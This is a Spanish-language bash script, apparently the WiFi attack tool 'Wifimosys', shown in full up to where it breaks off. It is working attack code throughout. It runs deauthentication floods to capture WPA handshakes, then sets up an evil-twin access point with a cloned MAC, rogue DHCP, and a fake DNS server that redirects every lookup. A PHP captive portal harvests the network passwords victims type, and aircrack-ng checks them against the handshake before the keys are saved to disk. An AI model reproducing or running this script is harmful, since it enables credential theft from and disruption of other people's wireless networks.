wifimosys

#!/bin/bash

##################################### Ajustes generales

version=0.25
RUTATEMP="/tmp/Wifimosys"
RUTAHANDSHAKE="/root/handshakes"
RUTAPASS="/root/pwlog"
grey="\033[0;37m"
red="\033[1;31m"
green="\033[1;32m"
yellow="\033[1;33m"
color="\e[0m"
black="\033[0;30m"
VENTSCAN="-geometry 95x40-0+0"
VENTHAND="-geometry 95x20-0+0"
VENTDEAU="-geometry 78x15-0-0"
VENTFAKE="-geometry 85x21-0-0"
VENTFDNS="-geometry 80x20+0-0"
VENTESPE="-geometry 95x26-0+0"
VENTDHCP="-geometry 90x17+0+0"
export nula=/dev/null
trap exitmode SIGINT SIGHUP

##################################### Mata todos los procesos

function exitmode {

	clear && echo -en "\e[3J"
	echo -e $red"$msgCambiado"$color
	echo
	echo -e $yellow"          Limpiando y cerrando..."
	echo
	
	if ps -A | grep -q airbase-ng; then echo -e $color"          Finalizando "$green"airbase-ng"
	killall airodump-ng &>$nula; fi

	if ps -A | grep -q aireplay-ng; then echo -e $color"          Finalizando "$green"aireplay-ng"
	killall airodump-ng &>$nula; fi

	if ps -A | grep -q airodump-ng; then echo -e $color"          Finalizando "$green"airodump-ng"
	killall airodump-ng &>$nula; fi

	if ps -A | grep python| grep fakedns; then echo -e $color"          Finalizando "$green"python"
	kill $(ps a | grep python| grep fakedns | awk '{print $1}') &>$nula; fi

	if ps -A | grep -q hostapd; then echo -e $color"          Finalizando "$green"hostapd"
	killall hostapd &>$nula; fi

	if ps -A | grep -q lighttpd; then echo -e $color"          Finalizando "$green"lighttpd"
	killall lighttpd &>$nula; fi

	if ps -A | grep -q dhcpd; then echo -e $color"          Finalizando "$green"dhcpd"
	killall dhcpd &>$nula; fi
	
	if ps -A | grep -q mdk3; then echo -e $color"          Finalizando "$green"mdk3"
	killall mdk3 &>$nula; fi

	if [ "$(cat /proc/sys/net/ipv4/ip_forward)" != "0" ]; then echo -e $color"          Deshabilitando "$green"reenvio de paquetes"
	sysctl -w net.ipv4.ip_forward=0 &>$nula; fi

	echo -e $color"          Limpiando "$green"iptables"
	iptables --flush
	iptables --table nat --flush
	iptables --delete-chain
	iptables --table nat --delete-chain

	echo -e $color"          Restaurando "$green"tput"
	tput cnorm

	if [ "$WIFI" != "" ]; then echo -e $color"          Deshabilitando interfaz "$green"$WIFI"
	airmon-ng stop $WIFI &> $nula; fi
	
	if [ "$WIFI_MONITOR" != "" ]; then echo -e $color"          Deshabilitando interfaz de monitoreo "$green"$WIFI_MONITOR"
	airmon-ng stop $WIFI_MONITOR &> $nula; fi
	
	echo -e $color"          Reiniciando "$green"Network Manager"
	/etc/rc.d/rc.networkmanager start &>$nula
	
	echo -e $color"          Borrando "$green"archivos temporales del script"
	rm -R $RUTATEMP/* &>$nula

	contra=/opt/Wireless-Keys/$Host_SSID-Wifimosys.txt
	
	if [ -e $contra ]; then
	  top
	  paplay "/usr/share/sounds/KDE-Sys-App-Positive.ogg"
	  echo -ne $green""
	  head "/opt/Wireless-Keys/$Host_SSID-Wifimosys.txt"
	  echo -e $yellow"        Datos guardados en$green /opt/Wireless-Keys/$Host_SSID-Wifimosys.txt"$yellow
	  echo
	  echo -e "        ¡ Gracias por usar Wifimosys y a disfrutar !"$color
	  echo
	else
	  echo
	  echo -e $green"          Limpieza realizada satisfactoriamente."
	  echo
	  echo -e $yellow"          Gracias por usar Wifimosys. "$color
	  echo
	  echo
	fi
	if [ "$CCHAN" == "cambiado" ] || [ "$CCHAN1" == "cambiado" ]; then
	  kill 0
	  else
	  exit
	fi
}

##################################### Cabecera

function top {
	
clear && echo -en "\e[3J"
echo
echo -e "$green	  ##########################################################"
echo -e "$green	  #                                                        #"
echo -e "$green	  #${yellow}	       WIFIMOSYS $version"" ${green}by ${yellow}Absolut Vodker""$green            #"
echo -e "$green	  #${yellow}	              WIFI" "MO""${green}ron'" "${yellow}SYS""${green}tem""                   #"
echo -e "$green	  #                                                        #"
echo -e "$green	  #  Basado en LINSET de vk496 para seguridadwireless.net  #"
echo -e "$green	  #                                                        #"
echo -e "$green	  ##########################################################""$color"
echo
echo
}

clear

##################################### Crea las carpetas de trabajo

if [ ! -d $RUTATEMP ]; then mkdir -p $RUTATEMP &>$nula
fi
if [ ! -d $RUTAHANDSHAKE ]; then mkdir -p $RUTAHANDSHAKE &>$nula
fi
if [ ! -d $RUTAPASS ]; then mkdir -p $RUTAPASS &>$nula
fi

##################################### Título

clear && echo -en "\e[3J"$green
sleep 0.1 && echo -e "                    _   ___  _"
sleep 0.1 && echo -e "                   (_) / __)(_)"
sleep 0.1 && echo -e "             _ _ _  _ | |__  _  ____    ___    ___  _   _   ___"
sleep 0.1 && echo -e "            | | | || ||  __)| ||    \  / _ \  /___)| | | | /___)"
sleep 0.1 && echo -e "            | | | || || |   | || | | || |_| ||___ || |_| ||___ |"
sleep 0.1 && echo -e "             \____||_||_|   |_||_|_|_| \___/ (___/  \__  |(___/ "
sleep 0.1 && echo -e "                                                   (____/  $yellow $version"
sleep 2
top

##################################### Muestra la info del AP seleccionado

function infoap {

Host_MAC_info1=`echo $Host_MAC | awk 'BEGIN { FS = ":" } ; { print $1":"$2":"$3}' | tr [:upper:] [:lower:]`
Host_MAC_MODEL=`macchanger -l | grep $Host_MAC_info1 | cut -d " " -f 5-`
if [ "$Host_MAC_MODEL" = "" ] ;then
Host_MAC_MODEL="No identificado"
fi

echo -e $yellow"                       INFORMACIÓN DEL PUNTO DE ACCESO:"
echo
echo -e "                             "$color"SSID"$yellow" : $Host_SSID$msgOculta"
echo -e "                            "$color"Canal"$yellow" : $channel"
echo -e "                       "$color"Fabricante"$yellow" : $Host_MAC_MODEL"
echo -e "                              "$color"MAC"$yellow" : $mac"$color
echo
}

##################################### Elección del adaptador

function setinterface {

	top
	rfkill unblock all
	KILLMONITOR=`iwconfig 2>&1 | grep Monitor | awk '{print $1}'`

	for monkill in ${KILLMONITOR[@]}; do
	airmon-ng stop $monkill >$nula
	done

	readarray -t wirelessifaces < <(airmon-ng |grep "-" | cut -d- -f1)
	INTERFACESNUMBER=`airmon-ng| grep -c "-"`

	if [ "$INTERFACESNUMBER" -gt "0" ]; then
	    if [ "$INTERFACESNUMBER" -eq "1" ]; then
		i=1
		PREWIFI=$(echo ${wirelessifaces[$line]} | awk '{print $1}')
		ponemonitor
	    else
	    	echo -e $yellow"          Selecciona un adaptador wifi:"$color
		echo
		i=0
		for line in "${wirelessifaces[@]}"; do
			i=$(($i+1))
			wirelessifaces[$i]=$line
			echo -e "          ""$i)"$color" $line"
		done
		echo
		echo -n "          #? "
		read line
		PREWIFI=$(echo ${wirelessifaces[$line]} | awk '{print $1}')
		ponemonitor
	    fi
	else
		echo -e "                  No se ha encontrado ningún adaptador Wifi."
		echo
		echo -e "                         Cerrando que es gerundio..."
		sleep 5
		exitmode
	fi
}

function ponemonitor { # Mejorado por USUARIONUEVO

	if [ $(echo "$PREWIFI" | wc -m) -le 3 ]; then
		clear
		top
		setinterface
	fi

	readarray -t softwaremolesto < <(airmon-ng check $PREWIFI | tail -n +8 | grep -v "on interface" | awk '{ print $2 }')
	WIFIDRIVER=$(airmon-ng | grep "$PREWIFI" | awk '{print($(NF-2))}')
	if [ $WIFIDRIVER != rtl8723be ]; then
	rmmod -f "$WIFIDRIVER" &>$nula 2>&1
	fi

	for molesto in "${softwaremolesto[@]}"; do
		killall "$molesto" &>$nula
	done
	
	if [ $WIFIDRIVER != rtl8723be ]; then
	modprobe "$WIFIDRIVER" &>$nula 2>&1
	fi
	
	select PREWIFI in $INTERFACES; do
		break;
	done

	echo
	echo -ne $white"          Poniendo el interface $yellow$PREWIFI$color en modo Monitor..."
	WIFIMONITOR=$(airmon-ng start $PREWIFI | grep "enabled on" | cut -d " " -f 5 | cut -d ")" -f 1)
	WIFI_MONITOR=$WIFIMONITOR
	WIFI=$PREWIFI

	limpieza
}

##################################### Preparación

function limpieza {

	clear
	CSVDB=dump-01.csv
	rm -rf $RUTATEMP/*
	eligecanales
	seleccionared
}

##################################### Selección de Canal

function eligecanales {

	while true; do
		top
		echo -e $yellow"                      Elige escaneo de canal(es):"
		echo
		echo -e "                      "$yellow"1)"$color" Todos los canales $grey(menos preciso)"
		echo -e "                      "$yellow"2)"$color" Canal o canales específicos"
		echo -e "                      "$yellow"3)"$color" Salir"
		echo
		echo -en $yellow"                      #> "$color
		read chan
		echo
		case $chan in
			1 ) msgscan; xterm $HOLD -title "ESCANEANDO" $VENTSCAN -bg "#000000" -fg "#FFFFFF" -e airodump-ng -w $RUTATEMP/dump $WIFI_MONITOR; break ;;
			2 ) Scanchan; break ;;
			3 ) exitmode; break;;
			* ) break &eligecanales;;
	esac
	done
}

function msgscan {

	top
	echo -e $yellow"                           Obteniendo lista de redes...$color"
	echo
	echo -e "           Cierra la ventana ${yellow}ESCANEANDO$color cuando lo creas oportuno..."
	echo -e "           $grey(aprox. 40-60 segundos para detectar todos los clientes)"$color
	rm -rf $RUTATEMP/dump*
}

##################################### Elegir canal(es)

function Scanchan {

	top
	echo -e $yellow"                      Selecciona canal(es) a escanear:"$color
	echo
	echo -e "                      Canal único (ejemplo): "$yellow"6"$color""
	echo -e "                      Rango de canales (ejemplo): "$yellow"1-5"$color""
	echo -e "                      Canales múltiples (ejemplo): "$yellow"1,2,5-7,11"$color""
	echo
	echo -en $yellow"                      #> "$color
	read numcanal
	set -- ${numcanal}
	msgscan
	xterm $HOLD -title "ESCANEANDO canal(es) [$numcanal]" $VENTSCAN -bg "#000000" -fg "#FFFFFF" -e airodump-ng -w $RUTATEMP/dump --channel "$numcanal" $WIFI_MONITOR 
}

##################################### Elegir una red

function CalculaIV {

	IV=`cat $RUTATEMP/dump-01.csv | grep "$MAC," | cut -d"," -f11`
	if [ "$IV" -le "99" ];then DATAS="★☆☆☆☆";fi
	if [ "$IV" -ge "100" ];then DATAS="★★☆☆☆";fi
	if [ "$IV" -ge "300" ];then DATAS="★★★☆☆";fi
	if [ "$IV" -ge "500" ];then DATAS="★★★★☆";fi
	if [ "$IV" -ge "1000" ];then DATAS="★★★★★";fi
}

function seleccionared {

	top
	LINEAS_WIFIS_CSV=`wc -l $RUTATEMP/$CSVDB | awk '{print $1}'`

	if [ $LINEAS_WIFIS_CSV -le 3 ]; then
        limpieza && break
	fi

	wifionap=`cat $RUTATEMP/$CSVDB | egrep -a -n '(Station|Cliente)' | awk -F : '{print $1}'`
	wifionap=`expr $wifionap - 1`
	
	head -n $wifionap $RUTATEMP/$CSVDB &> $RUTATEMP/dump-02.csv
	tail -n +$wifionap $RUTATEMP/$CSVDB &> $RUTATEMP/clientes.csv
	
	echo "                               LISTADO DE REDES"
	echo
	echo "   Nº   DATAS   DIRECCIÓN MAC      CH   TIPO    PWR    NOMBRE DE LA RED"
	echo
	i=0

	while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do
		PRIVACY=$(echo $PRIVACY| tr -d "^ ")
		PRIVACY=${PRIVACY:0:4}
		if [ "$ESSID" == " " ] || [[ "$ESSID" == *"x00"* ]] || [ "$POWER" == "-1" ]; then
			ESSID="$grey  --Red_Oculta--$color"
			POWER="-129"
		fi

		if [ "${#MAC}" -ge "17" ] && [ "$PRIVACY" != "OPN" ] && [ "$CHANNEL" -ge "1" ]; then
			i=$(($i+1))
			POWER=$((POWER+130))
			CLIENTE=`cat $RUTATEMP/clientes.csv | grep $MAC`
			if [ "$CLIENTE" != "" ]; then
			CalculaIV
			echo -e $red"   $i\t$DATAS\t$MAC $CHANNEL\t$PRIVACY\t$POWER%   $ESSID"$color
			else
			echo -e $yellow"   $i\t     \t$MAC $CHANNEL\t$PRIVACY\t$POWER%   $ESSID"$color
			fi
			aidlenght=$IDLENGTH
			assid[$i]=$ESSID
			achannel[$i]=$CHANNEL
			amac[$i]=$MAC
			aprivacy[$i]=$PRIVACY
		fi
		
	done < $RUTATEMP/dump-02.csv
	echo
	echo -e $red"                En rojo:$color redes con posibles clientes conectados"
	echo
	echo -e $yellow"                Selecciona el nº de la red a atacar...$color"
	echo -e "                $grey(Para reescanear pulsa$yellow 0$grey. Para salir pulsa$yellow X$color)"
	echo
	echo -ne $yellow"                #>$color "
	read redwifi
	
	if [ "$redwifi" = "" ] ; then seleccionared
	fi
	
	case $redwifi in
		0 ) limpieza;;
		x|X|00 ) exitmode; break ;;
	esac

	idlenght=${aidlenght[$redwifi]}
	ssid=${assid[$redwifi]}
	channel=$(echo ${achannel[$redwifi]}|tr -d [:space:])
	mac=${amac[$redwifi]}
	privacy=${aprivacy[$redwifi]}
	Host_IDL=$idlength
	Host_ENC=$privacy
	Host_MAC=$mac
	Host_CHAN=$channel
	acouper=${#ssid}
	fin=$(($acouper-idlength))
	Host_SSID=${ssid:1:fin}
	
	if [[ "$Host_SSID" == *"--Red_Oculta--"* ]] ; then Host_SSID=""
	msgOculta="Red Oculta"
	fi
	caphandshake;
}

function caphandshake {

	top
	infoap
	echo
	echo -e "          $color     Es necesario un handshake$yellow válido$color para continuar."
	echo -e "           Usa uno de esta red ya obtenido (ejemplo:$yellow wifimosys.cap$color)"
	echo -e "                       o pulsa$yellow ENTER$color para capturar uno."$yellow
	echo
	echo -ne "           Nombre y extensión del archivo .cap:$color "
	read handscap
	if [ "$handscap" == "1" ]; then
	handshakeloc=$RUTAHANDSHAKE"/"$Host_SSID.cap
	else
	handshakeloc=$RUTAHANDSHAKE"/"$handscap
	fi
	echo -ne ""
	
	if [ "$handscap" = "" ]; then
		Handshake_statuscheck="      Capturando Handshake...."; Segs=20; MenuHandshake; captura
	else
		if [ -f "$handshakeloc" ]; then
			Host_SSID_loc=$(pyrit -r "$handshakeloc" analyze 2>&1 | grep "^#" | cut -d "(" -f2 | cut -d "'" -f2)
			Host_MAC_loc=$(pyrit -r "$handshakeloc" analyze 2>&1 | grep "^#" | cut -d " " -f3 | tr '[:lower:]' '[:upper:]')
			if [[ "$Host_MAC_loc" == *"$Host_MAC"* ]]; then
				if pyrit -r $handshakeloc analyze 2>&1 | sed -n /$(echo $Host_MAC | tr '[:upper:]' '[:lower:]')/,/^#/p | grep -vi "AccessPoint" | grep -qie "good\|workable"; then
					cp "$handshakeloc" $RUTATEMP/$Host_MAC-01.cap
					Host_SSID=$Host_SSID_loc
					sleep 1; matartodo; preataque;
				else
				echo -e "${red}      Handshake incompleto o corrupto"$color
				sleep 3
				fi
				caphandshake
			else
				echo -e "${red}          El archivo no corresponde con la red seleccionada"$color
				sleep 3
				caphandshake
			fi
		else
			echo -e "${yellow}      Archivo${red} $handscap ${yellow}no encontrado"$color
			sleep 3
			caphandshake
		fi
	fi
}

function MenuHandshake {

	top
	infoap
	echo -e $green"                     El proceso de captura es automático"
	echo -e "                     NO es necesario cerrar las ventanas"
	echo
	echo -e $yellow"                     $Handshake_statuscheck"$black
	echo
}

function elechand {

	echo -e "              "$yellow"1)"$color" Reintentar la captura $grey(modo normal, 20 segundos)"
	echo -e "              "$yellow"2)"$color" Reintentar la captura $grey(modo obstinado, 5 minutos)"
	echo -e "              "$yellow"3)"$color" Seleccionar otra red"
	echo -e "              "$yellow"4)"$color" Salir"
	echo " "
	echo -ne "$yellow              #>$color "
	read comphand
	case $comphand in
		1 ) Handshake_statuscheck="Capturando Handshake..."; Segs=20; MenuHandshake; captura; break;;
		2 ) Handshake_statuscheck="Capturando Handshake..."; Segs=300; MenuHandshake; captura; break;;
		3 ) seleccionared; break;;
		4 ) exitmode; break;;
		* ) MenuHandshake; elechand; break;;
	esac
}

##################################### Capturando Handshake

function captura {

	rm -rf $RUTATEMP/$Host_MAC*
	MenuHandshake

	xterm $HOLD -title "Capturando Handshake en $Host_SSID" $VENTHAND -bg "#000000" -fg "#FFFFFF" -e airodump-ng --ignore-negative-one --beacons --bssid $Host_MAC -w $RUTATEMP/$Host_MAC --channel $Host_CHAN -a $WIFI_MONITOR &
#	echo "$Host_MAC" >$RUTATEMP/mdk3.txt
#	sleep 2; xterm $HOLD -title "Expulsando clientes de $Host_SSID" $VENTDEAU -bg "#000000" -fg "#FF0009" -e mdk3 $WIFI_MONITOR d -b $RUTATEMP/mdk3.txt -c $Host_CHAN &
	sleep 2; xterm $HOLD -title "Expulsando clientes de $Host_SSID" $VENTDEAU -bg "#000000" -fg "#FF0009" -e aireplay-ng --deauth 99999 -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &
	YA=$(date "+%s")
	sleep 3
	until [ $(($(date "+%s")-$YA)) -ge $Segs ]; do
	  if [ -s $RUTATEMP/$Host_MAC-01.cap ] ; then
	    if aircrack-ng $RUTATEMP/$Host_MAC-01.cap | grep -q "1 handshake"; then
	    Handshake_statuscheck="CAPTURADO. Comprobando si es válido.$color"
	    killall mdk3 aireplay-ng airodump-ng >/dev/null 2>&1 &break &MenuHandshake &checkhandshake
	    fi
	  fi
	done
	redoculta
	Handshake_statuscheck="${red}  No se ha conseguido la captura.$color"
	killall mdk3 aireplay-ng airodump-ng >/dev/null 2>&1
	MenuHandshake; elechand
}

function redoculta {

        nombreoculto="$(cat $RUTATEMP/$Host_MAC-01.csv | grep "$Host_MAC," | cut -d"," -f14 | sed 's/^[[:space:]]*//')"
	msgOculta=""
	Host_SSID=$nombreoculto
}

##################################### Comprueba el handshake antes de continuar

function checkhandshake {

	Handshake_statuscheck="CAPTURADO. Comprobando si es válido.$color"
	sleep 2
	pyrit -r $RUTATEMP/$Host_MAC-01.cap -o $RUTATEMP/test.cap stripLive &>$nula

	if pyrit -r $RUTATEMP/test.cap analyze 2>&1 | grep -qie "good\|workable"; then
		if [ "$Host_SSID" = "" ] ; then
		redoculta
		fi
		pyrit -r $RUTATEMP/test.cap -o $RUTAHANDSHAKE/$Host_SSID.cap strip &>$nula
		sleep 1; matartodo; preataque;
		i=2
		break
	else
		Handshake_statuscheck="${red}Handshake incompleto, prueba de nuevo.$color"
		MenuHandshake
		elechand
	fi
	rm $RUTATEMP/test.cap &>$nula
}

##################################### PREATAQUE

function preataque {

	top
	infoap
	echo
	echo -e ""$color"          Handshake válido y guardado en $yellow/root/handshakes"
	echo
	echo -e ""$yellow"          Iniciando el ataque, espera un momento..."$color
	echo
	FAKEAP
	ataque1
	ataque2
}

function ataque1 {

##################################### Configuración HostAPD

xterm -title "Creando Certificado SSL" -e openssl req -subj '/CN=SEGURO/O=SEGURA/OU=SEGURA/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout /$RUTATEMP/server.pem -out /$RUTATEMP/server.pem
chmod 400 $RUTATEMP/server.pem
echo "interface=$WIFI
driver=nl80211
ssid=$Host_SSID
channel=$Host_CHAN" > $RUTATEMP/hostapd.conf

##################################### Página PHP de chequeo

echo "<?php
error_reporting(0);

\$count_my_page = (\"$RUTATEMP/hit.txt\");
\$hits = file(\$count_my_page);
\$hits[0] ++;
\$fp = fopen(\$count_my_page , \"w\");
fputs(\$fp , \"\$hits[0]\");
fclose(\$fp);

// Recibe los datos del formulario y los guarda

\$key1 = @\$_POST['key1'];

\$filename = \"$RUTATEMP/data.txt\";
\$filename2 = \"$RUTATEMP/status.txt\";
\$intento = \"$RUTATEMP/intento\";
\$attemptlog = \"$RUTATEMP/pwattempt.txt\";
\$fallidos = \"$RUTATEMP/fallidos.txt\";

\$f_data= ''.\$key1.'';

\$pwlog = fopen(\$attemptlog, \"w\");
fwrite(\$pwlog,\"\$f_data\");
fwrite(\$pwlog,\"\n\");
fclose(\$pwlog);

if ( (strlen(\$key1) < 8) ) {
echo \"<script type=\\\"text/javascript\\\">alert(\\\"La clave debe ser superior a 7 caracteres\\\");window.history.back()</script>\";
break;
}

if ( (strlen(\$key1) > 63) ) {
echo \"<script type=\\\"text/javascript\\\">alert(\\\"La clave debe ser inferior a 64 caracteres\\\");window.history.back()</script>\";
break;
}

\$file = fopen(\$filename, \"w\");
fwrite(\$file,\"\$f_data\");
fwrite(\$file,\"\n\");
fclose(\$file);

\$fallo = fopen(\$fallidos, \"a\");
fwrite(\$fallo,\"    "$yellow"Password erróneo introducido: "$red"\");
fwrite(\$fallo,\"\$f_data\");
fwrite(\$fallo,\"\n\");
fclose(\$fallo);

\$archivo = fopen(\$intento, \"w\");
fwrite(\$archivo,\"\n\");
fclose(\$archivo);

while(1)
{

if (file_get_contents(\"\$intento\") == 2) {header(\"location:final.html\");
	    break;}
	    
if (file_get_contents(\"\$intento\") == 1) {
echo \"<script type=\\\"text/javascript\\\">alert(\\\"El password no es correcto\\\");window.history.back()</script>\";
	    unlink(\$intento);
	    break;
}

sleep(1);
}

?>" > $RUTATEMP/data/check.php

echo > $RUTATEMP/fallidos.txt

##################################### Configuración del servidor DHCP

echo "authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option broadcast-address 192.168.1.255;
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 192.168.1.1;
range 192.168.1.200 192.168.1.254;
pool {
range 192.168.1.1 192.168.1.199;
allow unknown-clients;
}}" >$RUTATEMP/dhcpd.conf
touch $RUTATEMP/leases

##################################### Configuración del servidor web Lighttpd

echo "server.document-root = \"$RUTATEMP/data/\"

server.modules = (
  \"mod_access\",
  \"mod_alias\",
  \"mod_accesslog\",
  \"mod_fastcgi\",
  \"mod_redirect\",
  \"mod_rewrite\"
)

fastcgi.server = ( \".php\" => ((
  \"bin-path\" => \"/usr/bin/php-cgi\",
  \"socket\" => \"/php.socket\"
)))

server.port = 80
server.pid-file = \"/var/run/lighttpd.pid\"
#server.username = \"www\"
#server.groupname = \"www\"

mimetype.assign = (
\".html\" => \"text/html\",
\".htm\" => \"text/html\",
\".txt\" => \"text/plain\",
)

server.error-handler-404 = \"/index.htm\"
server.error-handler-511 = \"/\"

static-file.exclude-extensions = ( \".fcgi\", \".rb\", \"~\", \".inc\" )
index-file.names = ( \"/index.htm\" )

\$SERVER[\"socket\"] == \":443\" {
url.redirect = ( \"^/(.*)\" => \"http://www.error.com\")
ssl.engine = \"enable\"
ssl.pemfile = \"$RUTATEMP/server.pem\"
}

\$HTTP[\"host\"] =~ \"^www\.(.*)$\" {
url.redirect = ( \"^/(.*)\" => \"http://%1/\$1\" )
ssl.engine = \"enable\"
ssl.pemfile = \"$RUTATEMP/server.pem\"
}

accesslog.filename = \"$RUTATEMP/Huella.log\"
" >$RUTATEMP/lighttpd.conf

##################################### Redirige las peticiones DNS (script de Francisco Santos)

echo "import socket

class DNSQuery:
  def __init__(self, data):
    self.data=data
    self.dominio=''

    tipo = (ord(data[2]) >> 3) & 15
    if tipo == 0:
      ini=12
      lon=ord(data[ini])
      while lon != 0:
	self.dominio+=data[ini+1:ini+lon+1]+'.'
	ini+=lon+1
	lon=ord(data[ini])

  def respuesta(self, ip):
    packet=''
    if self.dominio:
      packet+=self.data[:2] + \"\x81\x80\"
      packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
      packet+=self.data[12:]
      packet+='\xc0\x0c'
      packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
      packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.')))
    return packet

if __name__ == '__main__':
  ip='192.168.1.1'
  print ' '
  print '   REDIRIGIENDO TODAS LAS PETICIONES DNS HACIA %s' % ip
  print ' '
  udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  udps.bind(('',53))

  try:
    while 1:
      data, addr = udps.recvfrom(1024)
      p=DNSQuery(data)
      udps.sendto(p.respuesta(ip), addr)
      print '   Resolviendo: %s -> %s' % (p.dominio, ip)
  except KeyboardInterrupt:
    print '   Finalizando'
    udps.close()
" >$RUTATEMP/fakedns
chmod +x $RUTATEMP/fakedns
}

##################################### Prepara las tablas de enrutamiento para el servidor DHCP/WEB

function routear {

	ifconfig $interfaceroutear up
	ifconfig $interfaceroutear 192.168.1.1 netmask 255.255.255.0
	ifconfig $interfaceroutear up
	ifconfig $interfaceroutear 192.168.1.1 netmask 255.255.255.0

	route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
	sysctl net.ipv4.ip_forward=1 &>$nula

	iptables --flush
	iptables --table nat --flush
	iptables --delete-chain
	iptables --table nat --delete-chain
	iptables -P FORWARD ACCEPT
	iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.1:80
	iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.1.1:443
	iptables -A INPUT -p tcp --sport 443 -j ACCEPT
	iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT
	iptables -t nat -A POSTROUTING -j MASQUERADE
}

##################################### ATAQUE

function ataque2 {

	interfaceroutear=$WIFI
	compruebapass
	nomac=$(tr -dc A-F0-9 < /dev/urandom | fold -w2 |head -n100 | grep -v "${mac:13:1}" | head -c 1)

	if [ "$(echo $WIFIDRIVER | grep -i 8187)" ]; then
		interfaceroutear=at0
		killall airbase-ng &> $nula
		xterm $VENTFAKE -bg "#000000" -fg "#FFFFFF" -title "FAKE AP (airbase)" -e airbase-ng -P -e $Host_SSID -c $Host_CHAN -a ${mac::13}$nomac${mac:14:4} $WIFI_MONITOR &
	else
		ifconfig $WIFI down
		sleep 0.4
		macchanger --mac=${mac::13}$nomac${mac:14:4} $WIFI &> $nula
		sleep 0.4
		ifconfig $WIFI up
		sleep 0.4
		killall hostapd &> $nula
		xterm $HOLD $VENTFAKE -bg "#000000" -fg "#FFFFFF" -title "FAKE AP (hostapd)" -e hostapd $RUTATEMP/hostapd.conf &
	fi

	sleep 3
	routear &

	killall dhcpd &> $nula
	fuser -n tcp -k 53 67 80 &> $nula
        fuser -n udp -k 53 67 80 &> $nula
        sleep 0.5
        monitoreo &
        sleep 0.5
	xterm -bg black -fg green $VENTDHCP -T DHCP -e "dhcpd -d -f -lf "$RUTATEMP/leases" -cf "$RUTATEMP/dhcpd.conf" $interfaceroutear 2>&1 | tee -a $RUTATEMP/clientes.txt" &
	sleep 0.5
	xterm $VENTFDNS -bg "#000000" -fg "#99CCFF" -title "FAKE DNS" -e python $RUTATEMP/fakedns &
	sleep 0.5
	lighttpd -f $RUTATEMP/lighttpd.conf &> $nula
	
	echo "$Host_MAC" >$RUTATEMP/mdk3.txt
	xterm $HOLD $VENTDEAU -bg "#000000" -fg "#FF0009" -title "Expulsando clientes [mdk3] $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $RUTATEMP/mdk3.txt -c $Host_CHAN &
#	xterm $HOLD -title "Expulsando clientes de $Host_SSID" $VENTDEAU -bg "#000000" -fg "#FF0009" -e wifijammer.py -a $Host_MAC -c $Host_CHAN -t .01 -p 5 -d --world -i $WIFI_MONITOR &
	xterm -hold $VENTESPE -title "ESPERANDO EL PASSWORD, TEN PACIENCIA" -e $RUTATEMP/handcheck &

	limpialog

	while true; do
	limpialog
	top
	infoap
	echo -e ""$yellow"                         Atacando al objetivo..."
	echo
	echo -e "                       1)$color Parar el ataque y salir"
	echo
	echo -ne $yellow"                       #> "$color
	read enataque
	case $enataque in
		1 ) CCHAN1="cambiado"; matartodo; exitmode; break;;
		* ) limpialog;;
	esac
	done
}

function monitoreo {

	xterm $HOLD -title "Monitorizando AP original" -e airodump-ng -w $RUTATEMP/monitor --bssid $Host_MAC --channel $Host_CHAN -a $WIFI_MONITOR &
	until [ "$CCHAN" == "cambiado" ]; do
	sleep 10
	Mon_CHAN="$(cat $RUTATEMP/monitor-01.kismet.csv | grep "^1;" | cut -d";" -f6)"
	if [ "$Host_CHAN" != "$Mon_CHAN" ]; then
	paplay "/usr/share/sounds/KDE-Sys-Warning.ogg"
	CCHAN="cambiado"
	msgCambiado="          Script finalizado.\n          $yellow$Host_SSID$red ha cambiado su canal de $Host_CHAN a $Mon_CHAN \n          o ya no está dentro del alcance."
	break & killall airodump-ng &>$wifim_output_device & matartodo; exitmode;
	fi
	done
}

##################################### Comprueba que el password es correcto

function compruebapass {

	echo "#!/bin/bash

	echo > $RUTATEMP/data.txt
	echo -n \"0\"> $RUTATEMP/hit.txt
	echo "" >$RUTATEMP/loggg
	tput civis
	clear

	minutos=0
	horas=0
	i=0

	while true; do

	segundos=\$i
	dias=\`expr \$segundos / 86400\`
	segundos=\`expr \$segundos % 86400\`
	horas=\`expr \$segundos / 3600\`
	segundos=\`expr \$segundos % 3600\`
	minutos=\`expr \$segundos / 60\`
	segundos=\`expr \$segundos % 60\`

	if [ \"\$segundos\" -le 9 ]; then
	is=\"0\"
	else
	is=
	fi

	if [ \"\$minutos\" -le 9 ]; then
	im=\"0\"
	else
	im=
	fi

	if [ \"\$horas\" -le 9 ]; then
	ih=\"0\"
	else
	ih=
	fi">>$RUTATEMP/handcheck

	echo "if [ -f $RUTATEMP/intento ]; then
		
		if ! aircrack-ng -w $RUTATEMP/data.txt $RUTATEMP/$Host_MAC-01.cap | grep -qi \"Passphrase not in\"; then
		echo \"2\">$RUTATEMP/intento
		break
		else
		echo \"1\">$RUTATEMP/intento
		fi
		
	      fi">>$RUTATEMP/handcheck
		
	echo "readarray -t CLIENTESDHCP < <(cat $RUTATEMP/clientes.txt | grep -e \"(*) via\" | grep -e \"DHCPACK on\"| sort | uniq | awk '!x[\$0]++' )

	echo
	echo -e \"$yellow    ATAQUE EN CURSO...""$color\"
	echo -e
	echo -e \"$grey    (Esperando a que un usuario se conecte y cargue la página del Fake AP)""$color\"
	echo
	echo -e \"         SSID..............: "$green"$Host_SSID"$color"\"
	echo -e \"         MAC...............: "$color"$Host_MAC"$color"\"
	echo -e \"         Canal.............: "$color"$Host_CHAN"$color"\"
	echo -e \"         Fabricante........: "$color"$Host_MAC_MODEL"$color"\"
	echo -e \"         Tiempo atacando...: "$color"\$ih\$horas:\$im\$minutos:\$is\$segundos"$color"\"
	echo
